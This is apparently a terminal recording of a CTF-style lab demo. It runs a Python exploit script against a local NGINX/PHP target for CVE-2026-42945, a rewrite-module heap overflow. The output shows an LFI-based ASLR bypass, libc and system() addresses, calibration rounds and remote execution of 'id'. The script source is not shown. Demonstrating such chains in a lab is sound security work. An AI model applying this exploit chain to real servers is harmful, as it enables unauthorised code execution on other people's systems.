[0.000, "o", "    \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                                                                                                                            \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                                                                                                                            \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                                                                                                                            \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                                                                                                                            \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                                                                                                                            \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[40B\r\u001b[;m \u001b[;m \u001b[;38;5;144m2/26171 (0)\u001b[0m\u001b[;38;5;59m \u001b[0m\u001b[;38;5;59m─"]
[0.000, "o", "────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[0m\u001b[;m \u001b[1B\r\u001b[45C\u001b[?25h\u001b[?7h"]
[0.001, "o", "\u001b[?7l\u001b[?25l\r\u001b[45C\u001b[?25h\u001b[?7h"]
[0.081, "o", "\u001b[?7l\u001b[?25l\u001b[1A\r\u001b[;m \u001b[;m \u001b[;38;5;144m2/26171 (0)\u001b[0m\u001b[;38;5;59m \u001b[0m\u001b[;38;5;59m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[0m\u001b[;m \u001b[1B\r\u001b[45C\u001b[?25h\u001b[?7h"]
[0.013, "o", "\u001b[?7l\u001b[?25l\u001b[2B\r\u001b[2C\r\u001b[2C\u001b[;mpython\r\u001b[8C\u001b[;38;2;178;178;178m \u001b[0m\r\u001b[9C\u001b[;38;2;204;204;255m./demo_ctf_exploit_v1_9.py\u001b[0m\r\u001b[35C\u001b[;38;2;178;178;178m \u001b[0m\r\u001b[36C\u001b[;38;2;204;204;255m--help\u001b[0m\r\u001b[42C\r\u001b[42C\u001b[;m                                                                                                                \r\u001b[42C\u001b[1B\r\u001b[2C\u001b[m\r\u001b[2C\u001b[;m                                                                                                                                                        \r\u001b[2C\u001b[1B\r\u001b[2C\u001b[;m                                                                                                                                                        \r\u001b[2C\u001b[2A\r\u001b[154C\u001b[;38;5;59m \u001b[0m\u001b[1B\r\u001b[154C\u001b[;38;5;59m \u001b[0m\u001b[1B\r\u001b[154C\u001b[;38;5;59m \u001b[0m\u001b[4A\r\u001b[45C\u001b[?25h\u001b[?7h"]
[0.881, "o", "\u001b[?7l\u001b[?25l\u001b[2A\r\u001b[;38;5;236m▌\u001b[0m\u001b[;m \u001b[;m05-15 06:15:20 │ \u001b[0m\u001b[;38;5;108mp\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108my\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108mt\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108mh\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108mo\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108mn\u001b[0m\u001b[;m \u001b[0m\u001b[;38;5;108m.\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108m/\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108md\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108me\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108mm\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108mo\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108m_\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108mc\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108mt\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108mf\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108m_\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108me\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108mx\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108mp\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108ml\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108mo\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108mi\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108mt\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108m_\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108mv\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108m1\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108m_\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108m9\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108m.\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108mp\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108my\u001b[0m\u001b[;m \u001b[0m\u001b[;38;5;108m-\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108m-\u001b[0m\u001b[;mhelp\u001b[0m\u001b[1A\r\u001b[;1;38;5;161;48;5;236m▌\u001b[0m\u001b[;48;5;236m \u001b[0m\u001b[;1;38;5;254;48;5;236m05-15 06:13:10 │ \u001b[0m\u001b[;"]
[0.000, "o", "1;38;5;151;48;5;236mp\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236my\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236mt\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236mh\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236mo\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236mn\u001b[0m\u001b[;1;38;5;254;48;5;236m \u001b[0m\u001b[;1;38;5;151;48;5;236m.\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236m/\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236md\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236me\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236mm\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236mo\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236m_\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236mc\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236mt\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236mf\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236m_\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236me\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236mx\u001b[0m\u001b[;1;38;"]
[0.000, "o", "5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236mp\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236ml\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236mo\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236mi\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236mt\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236m_\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236mv\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236m1\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236m_\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236m9\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236m.\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236mp\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236my\u001b[0m\u001b[;1;38;5;254;48;5;236m \u001b[0m\u001b[;1;38;5;151;48;5;236m-\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236m-\u001b[0m\u001b[;1;38;5;254;48;5;236mhost 192.168.1.205:19321 --cmd id --clear\u001b[0m\u001b[3B\r\u001b[45C\u001b[?25h\u001b[?7h"]
[0.096, "o", "\u001b[?7l\u001b[?25l\u001b[2B\r\u001b[2C\r\u001b[2C\u001b[;mpython\r\u001b[8C\u001b[;38;2;178;178;178m \u001b[0m\r\u001b[9C\u001b[;38;2;204;204;255m./demo_ctf_exploit_v1_9.py\u001b[0m\r\u001b[35C\u001b[;38;2;178;178;178m \u001b[0m\r\u001b[36C\u001b[;38;2;204;204;255m--host\u001b[0m\r\u001b[42C\u001b[;38;2;178;178;178m \u001b[0m\r\u001b[43C\u001b[;38;2;204;204;255m192.168.1.205:19321\u001b[0m\r\u001b[62C\u001b[;38;2;178;178;178m \u001b[0m\r\u001b[63C\u001b[;38;2;204;204;255m--cmd\u001b[0m\r\u001b[68C\u001b[;38;2;178;178;178m \u001b[0m\r\u001b[69C\u001b[;38;2;204;204;255mid\u001b[0m\r\u001b[71C\u001b[;38;2;178;178;178m \u001b[0m\r\u001b[72C\u001b[;38;2;204;204;255m--clear\u001b[0m\r\u001b[79C\r\u001b[79C\u001b[;m                                                                           \r\u001b[79C\u001b[1B\r\u001b[2C\u001b[m\r\u001b[2C\u001b[;m                                                                                                                                                        \r\u001b[2C\u001b[1B\r\u001b[2C\u001b[;m                                                                                                                                                        \r\u001b[2C\u001b[2A\r\u001b[154C\u001b[;38;5;59m \u001b[0m\u001b[1B\r\u001b[154C\u001b[;38;5;59m \u001b[0m\u001b[1B\r\u001b[154C\u001b[;38;5;59m \u001b[0m\u001b[4A\r\u001b[45C\u001b[?25h\u001b[?7h"]
[0.387, "o", "\u001b[?1049l\u001b[?7l\u001b[?25l\u001b[?1000l\u001b[?1002l\u001b[?1006l\u001b[?2004l\u001b[?25h\u001b[?7h"]
[0.001, "o", "\u001b[?2004h\u001b[?2031h\u001b[=5u"]
[0.000, "o", "\u001b[36Dpython ./demo_ctf_exploit_v1_9.py --host 192.168.1.205:19321 --cmd id --clear\r\u001b[151C\u001b[38;2;102;102;102m147ms\u001b[38;2;178;178;178m\u001b[38;2;102;102;102m\u001b[m\r\u001b[151C\r\u001b[125C\u001b[?2004l\u001b[?2031l\u001b[=0u"]
[0.097, "o", "\u001b]0;fish ~/D/t/n/Nginx-Rift\u0007\u001b[m\u001b[?2004h\u001b[?2031h\u001b[=5u\r"]
[0.000, "o", "\u001b]133;A;click_events=1\u0007\u001b]133;D;0\u0007\u001b]1337;RemoteHost=hamid@MacBook-Pro.local\u0007\u001b]1337;CurrentDir=/Users/hamid/Downloads/temp/nginx-rift/Nginx-Rift\u0007\u001b]133;A\u0007\u001b[m\u001b[38;2;153;153;153;48;2;51;51;51m ~/D/t/n/\u001b[38;2;255;255;255;48;2;51;51;51;1mNginx-Rift \u001b[m\u001b[38;2;12;72;1;48;2;173;220;16m\u001b[38;2;51;51;51m \u001b[38;2;12;72;1m ctf-remote-aslr-lfi … \u001b[m\u001b[m\u001b[38;2;173;220;16m \u001b[m\u001b]133;B\u0007\u001b]133;B\u0007\u001b[38;2;178;178;178mpython ./demo_ctf_exploit_v1_9.py --host 192.168.1.205:19321 --cmd id --clear\u001b[J\r\u001b[151C\u001b[38;2;102;102;102m147ms\u001b[38;2;178;178;178m\u001b[38;2;102;102;102m\u001b[m\r\u001b[151C\r\u001b[125C"]
[0.000, "o", "\u001b[77D\u001b[39mpython\u001b[38;2;178;178;178m \u001b[38;2;204;204;255;4m./demo_ctf_exploit_v1_9.py\u001b[38;2;178;178;178;24m \u001b[38;2;204;204;255m--host\u001b[38;2;178;178;178m \u001b[38;2;204;204;255m192.168.1.205:19321\u001b[38;2;178;178;178m \u001b[38;2;204;204;255m--cmd\u001b[38;2;178;178;178m \u001b[38;2;204;204;255mid\u001b[38;2;178;178;178m \u001b[38;2;204;204;255m--clear\u001b[38;2;178;178;178m\r\u001b[151C\u001b[38;2;102;102;102m147ms\u001b[38;2;178;178;178m\u001b[38;2;102;102;102m\u001b[m\r\u001b[151C\r\u001b[125C"]
[1.285, "o", "\u001b[?2004l\u001b[?2031l\u001b[=0u\r\n"]
[0.001, "o", "\u001b[m\u001b]133;C;cmdline_url=python%20./demo_ctf_exploit_v1_9.py%20--host%20192.168.1.205%3A19321%20--cmd%20id%20--clear\u0007"]
[0.000, "o", "\u001b]133;C;\r\u0007"]
[0.000, "o", "\u001b[2 q"]
[0.000, "o", "\u001b]0;python ~/D/t/n/Nginx-Rift\u0007\u001b[m\r"]
[0.170, "o", "\u001b[2J\u001b[H\r\n\u001b[1m\u001b[36mNginx Rift Remote ASLR Lab (v1.9)\u001b[0m\u001b[0m\r\n\u001b[2m============================================================================\u001b[0m\r\n"]
[0.000, "o", "Bug:      \u001b[1mCVE-2026-42945\u001b[0m - NGINX rewrite-module heap buffer overflow\r\nCause:    rewrite/set args-escaping length/copy mismatch\r\nTarget:   \u001b[1m192.168.1.205:19321\u001b[0m; vulnerable route /api/...\r\nProfile:  lab\r\nFile read:  /lfi.php?file=<path>\r\nRoutes:   phpinfo /phpinfo.php; HTTP/2 victim on the same listener\r\n"]
[0.000, "o", "Chain:    PHP LFI -> worker maps/libc -> readable core -> h2 cleanup overwrite\r\nASLR:     enabled; process-specific bases and final candidates are derived remotely\r\nCommand:  id\r\nOutput:   compact operator view; pass -v for probe trace\r\nFixed:    NGINX OSS 1.30.1 / 1.31.0; NGINX Plus R36 P4 / R35 P2 / R32 P6\r\n\u001b[2m============================================================================\u001b[0m\r\n\r\n"]
[0.325, "o", "    \u001b[2mrunner version:\u001b[0m    \u001b[32mv1.9 autonomous demo runner\u001b[0m\r\n"]
[0.069, "o", "\r\n\u001b[1m\u001b[34m[01] Remote target preflight\u001b[0m\u001b[0m\r\n\u001b[2m----------------------------------------------------------------------------\u001b[0m\r\n"]
[0.174, "o", "\u001b[2m+000.6s\u001b[0m \u001b[32m[+]\u001b[0m HTTP/1.1 listener is alive\r\n"]
[0.165, "o", "\u001b[2m+000.8s\u001b[0m \u001b[32m[+]\u001b[0m HTTP/2 returned 49 bytes\r\n"]
[0.184, "o", "    \u001b[2mtarget profile:\u001b[0m    lab\r\n"]
[0.064, "o", "    \u001b[2mrandomize_va_space:\u001b[0m \u001b[32m2\u001b[0m\r\n"]
[0.066, "o", "    \u001b[2mcore_pattern:\u001b[0m      \u001b[32mcore\u001b[0m\r\n"]
[0.068, "o", "    \u001b[2msuid_dumpable:\u001b[0m     \u001b[32m2\u001b[0m\r\n"]
[0.069, "o", "    \u001b[2mos release:\u001b[0m        Ubuntu 22.04.3 LTS\r\n"]
[0.069, "o", "    \u001b[2mnginx master PID:\u001b[0m  3044\r\n"]
[0.068, "o", "    \u001b[2mworker children:\u001b[0m   3211\r\n"]
[0.065, "o", "\r\n\u001b[1m\u001b[34m[02] Remote ASLR discovery through PHP LFI\u001b[0m\u001b[0m\r\n\u001b[2m----------------------------------------------------------------------------\u001b[0m\r\n"]
[0.177, "o", "    \u001b[2mnginx worker PID:\u001b[0m  \u001b[33m3211\u001b[0m\r\n"]
[0.064, "o", "    \u001b[2mnginx writable map:\u001b[0m \u001b[35m0x55e420b83000\u001b[0m\r\n"]
[0.070, "o", "    \u001b[2mlibc base:\u001b[0m         \u001b[35m0x7fca47a6d000\u001b[0m\r\n"]
[0.064, "o", "    \u001b[2msystem() address:\u001b[0m  \u001b[32m0x7fca47abdd70\u001b[0m\r\n"]
[0.140, "o", "\r\n\u001b[1m\u001b[34m[03] Remote Version Fingerprint\u001b[0m\u001b[0m\r\n\u001b[2m----------------------------------------------------------------------------\u001b[0m\r\n"]
[0.165, "o", "    \u001b[2mOS:\u001b[0m                \u001b[32mUbuntu 22.04.3 LTS\u001b[0m\r\n"]
[0.067, "o", "    \u001b[2mOS codename:\u001b[0m       jammy\r\n"]
[0.068, "o", "    \u001b[2mkernel release:\u001b[0m    \u001b[32m5.15.0-84-generic\u001b[0m\r\n"]
[0.068, "o", "    \u001b[2mHTTP Server:\u001b[0m       \u001b[32mnginx/1.31.0\u001b[0m\r\n"]
[0.065, "o", "    \u001b[2mPHP version:\u001b[0m       \u001b[32m8.1.2-1ubuntu2.23\u001b[0m\r\n"]
[0.068, "o", "    \u001b[2mPHP Server API:\u001b[0m    FPM/FastCGI\r\n"]
[0.069, "o", "    \u001b[2mnginx binary versions:\u001b[0m \u001b[32mnginx/1.31.0\u001b[0m\r\n"]
[0.069, "o", "    \u001b[2mnginx build-id:\u001b[0m    060e053ab1fa1a2876b7fe0ff4eff0cc777857b6\r\n"]
[0.065, "o", "    \u001b[2mnginx sha256:\u001b[0m      14bebe8937678598b8ebb8449f8c1554\r\n"]
[0.066, "o", "    \u001b[2mlibc dpkg version:\u001b[0m \u001b[32m2.35-0ubuntu3.13\u001b[0m\r\n"]
[0.065, "o", "    \u001b[2mglibc symbol range:\u001b[0m GLIBC_2.2.5 .. GLIBC_2.35\r\n"]
[0.069, "o", "    \u001b[2mlibc build-id:\u001b[0m     095c7ba148aeca81668091f718047078d57efddb\r\n"]
[0.067, "o", "    \u001b[2mlibc sha256:\u001b[0m       c53819710b163d3f1d2541778590d58d\r\n"]
[0.070, "o", "\r\n\u001b[1m\u001b[34m[04] Remote command verification setup\u001b[0m\u001b[0m\r\n\u001b[2m----------------------------------------------------------------------------\u001b[0m\r\n"]
[0.163, "o", "    \u001b[2mmarker path:\u001b[0m       \u001b[33m/tmp/nginx_rift_demo_v1_9_124842a2bd54\u001b[0m\r\n"]
[0.067, "o", "    \u001b[2mexec command:\u001b[0m      \u001b[32mid\u001b[0m\r\n"]
[0.069, "o", "    \u001b[2mexploit rounds:\u001b[0m    2\r\n"]
[0.069, "o", "\r\n\u001b[1m\u001b[34m[05] Exploit round 1/2: calibration probes\u001b[0m\u001b[0m\r\n\u001b[2m----------------------------------------------------------------------------\u001b[0m\r\n"]
[0.161, "o", "\u001b[2m+003.5s\u001b[0m \u001b[36m[*]\u001b[0m testing up to 12 geometry candidate(s)\r\n"]
[3.318, "o", "\u001b[2m+006.8s\u001b[0m \u001b[32m[+]\u001b[0m selected geometry A=127, plus=962 with 60 ranked candidate(s)\r\n"]
[0.160, "o", "\r\n\u001b[1m\u001b[34m[06] Worker reset and fresh address derivation\u001b[0m\u001b[0m\r\n\u001b[2m----------------------------------------------------------------------------\u001b[0m\r\n"]
[2.992, "o", "\u001b[2m+010.0s\u001b[0m \u001b[32m[+]\u001b[0m nginx worker recovered\r\n"]
[0.460, "o", "\u001b[2m+010.4s\u001b[0m \u001b[32m[+]\u001b[0m using 60 candidates from the fresh reset core\r\n"]
[0.162, "o", "    \u001b[2mfinal payload size:\u001b[0m 328\r\n"]
[0.069, "o", "    \u001b[2mcandidate sanity kept:\u001b[0m \u001b[32m50\u001b[0m\r\n"]
[0.069, "o", "    \u001b[2mcandidate sanity dropped:\u001b[0m \u001b[33m10\u001b[0m\r\n"]
[0.069, "o", "\r\n\u001b[1m\u001b[34m[07] Final exploit attempts for A=127, plus=962\u001b[0m\u001b[0m\r\n\u001b[2m----------------------------------------------------------------------------\u001b[0m\r\n"]
[1.527, "o", "\r\n\u001b[1m\u001b[34m[08] Result\u001b[0m\u001b[0m\r\n\u001b[2m----------------------------------------------------------------------------\u001b[0m\r\n"]
[0.165, "o", "\u001b[2m+012.5s\u001b[0m \u001b[32m[+]\u001b[0m CTF WIN: marker token was read back through LFI\r\n"]
[0.165, "o", "    \u001b[2mwinning address:\u001b[0m   \u001b[32m0x55e4210b2127\u001b[0m\r\n"]
[0.069, "o", "    \u001b[2mwinning body offset:\u001b[0m \u001b[32m1376\u001b[0m\r\n"]
[0.069, "o", "    \u001b[2mmarker path:\u001b[0m       \u001b[33m/tmp/nginx_rift_demo_v1_9_124842a2bd54\u001b[0m\r\n"]
[0.070, "o", "    \u001b[2mrun artifact:\u001b[0m      artifacts/demo_v1_9_20260515-061537.json\r\n"]
[0.069, "o", "\r\n\u001b[1m\u001b[34m[09] Command Output\u001b[0m\u001b[0m\r\n\u001b[2m----------------------------------------------------------------------------\u001b[0m\r\n"]
[0.165, "o", "    \u001b[2mexec command:\u001b[0m      \u001b[35mid\u001b[0m\r\n"]
[0.069, "o", "    \u001b[2mcaptured bytes:\u001b[0m    \u001b[35m58\u001b[0m\r\n"]
[0.069, "o", "    \u001b[2mdisplay:\u001b[0m           \u001b[35mcomplete\u001b[0m\r\n"]
[0.069, "o", "\r\n\u001b[1;96muid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)\u001b[0m\r\n"]
[0.017, "o", "\u001b]133;D;0\u0007"]
[0.000, "o", "\u001b[6 q"]
[0.000, "o", "\u001b[?25h"]
[0.000, "o", "\u001b[2m⏎\u001b[m                                                                                                                                                           \r⏎ \r\u001b[K"]
[0.000, "o", "\u001b]7;file://MacBook-Pro.local/Users/hamid/Downloads/temp/nginx-rift/Nginx-Rift\u0007"]
[0.101, "o", "\u001b]0;fish ~/D/t/n/Nginx-Rift\u0007\u001b[m\u001b]11;?\u001b\\\u001b[6n\u001b[0c\u001b[?2004h\u001b[?2031h\u001b[=5u"]
[0.000, "o", "\u001b]133;A;click_events=1\u0007\u001b]133;D;0\u0007\u001b]1337;RemoteHost=hamid@MacBook-Pro.local\u0007\u001b]1337;CurrentDir=/Users/hamid/Downloads/temp/nginx-rift/Nginx-Rift\u0007\u001b]133;A\u0007\u001b[m\u001b[38;2;153;153;153;48;2;51;51;51m ~/D/t/n/\u001b[38;2;255;255;255;48;2;51;51;51;1mNginx-Rift \u001b[m\u001b[38;2;12;72;1;48;2;173;220;16m\u001b[38;2;51;51;51m \u001b[38;2;12;72;1m ctf-remote-aslr-lfi … \u001b[m\u001b[m\u001b[38;2;173;220;16m \u001b[m\u001b]133;B\u0007\u001b]133;B\u0007\u001b[38;2;178;178;178m\u001b[K\r\u001b[151C\u001b[38;2;102;102;102m13.5s\u001b[38;2;178;178;178m\u001b[38;2;102;102;102m\u001b[m\r\u001b[151C\r\u001b[48C"]
[4.473, "o", "\u001b[?2004l\u001b[?2031l\u001b[=0u\r\n"]
[0.000, "o", "\u001b[m"]
[0.000, "o", "\u001b[m"]
[0.001, "o", "\u001b[2 q"]
[0.001, "x", "0"]
